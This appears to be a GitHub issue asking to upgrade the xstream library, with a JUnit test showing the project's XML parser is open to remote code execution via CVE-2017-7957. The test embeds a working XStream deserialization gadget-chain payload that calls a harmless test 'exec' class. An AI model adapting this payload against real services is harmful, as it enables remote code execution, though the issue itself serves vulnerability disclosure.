更新 xstream dependency version #44
Description
influenced by old version of xstream and may caused remote code execution. see test below:
package plm.common.utils;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.core.JVM;
import org.junit.Before;
import org.junit.Test;
import java.util.Iterator;
import static org.junit.Assert.assertEquals;
public class XMLConfigTest {
private static final StringBuilder BUFFER = new StringBuilder();
private XMLConfig xmlConfig;
@Before
public void setUp() {
xmlConfig = new XMLConfig();
}
@Test
public void testToBeanVulnerableToCVE_2017_7957() {
if (JVM.isVersion(7)) {
final String xml = ""
+ "<string class='javax.imageio.spi.FilterIterator'>\n"
+ " <iter class='java.util.ArrayList$Itr'>\n"
+ " <cursor>0</cursor>\n"
+ " <lastRet>1</lastRet>\n"
+ " <expectedModCount>1</expectedModCount>\n"
+ " <outer-class>\n"
+ " <com.thoughtworks.acceptance.SecurityVulnerabilityTest_-Exec/>\n"
+ " </outer-class>\n"
+ " </iter>\n"
+ " <filter class='javax.imageio.ImageIO$ContainsFilter'>\n"
+ " <method>\n"
+ " <class>com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec</class>\n"
+ " <name>exec</name>\n"
+ " <parameter-types/>\n"
+ " </method>\n"
+ " <name>exec</name>\n"
+ " </filter>\n"
+ " <next/>\n"
+ "</string>";
XStream xstream = new XStream();
xstream.allowTypes(new String[]{"javax.imageio.ImageIO$ContainsFilter"});
final Iterator iterator = (Iterator) xmlConfig.toBean(xml, Iterator.class);
assertEquals(0, BUFFER.length());
iterator.next();
assertEquals("Executed!", BUFFER.toString());
}
}
}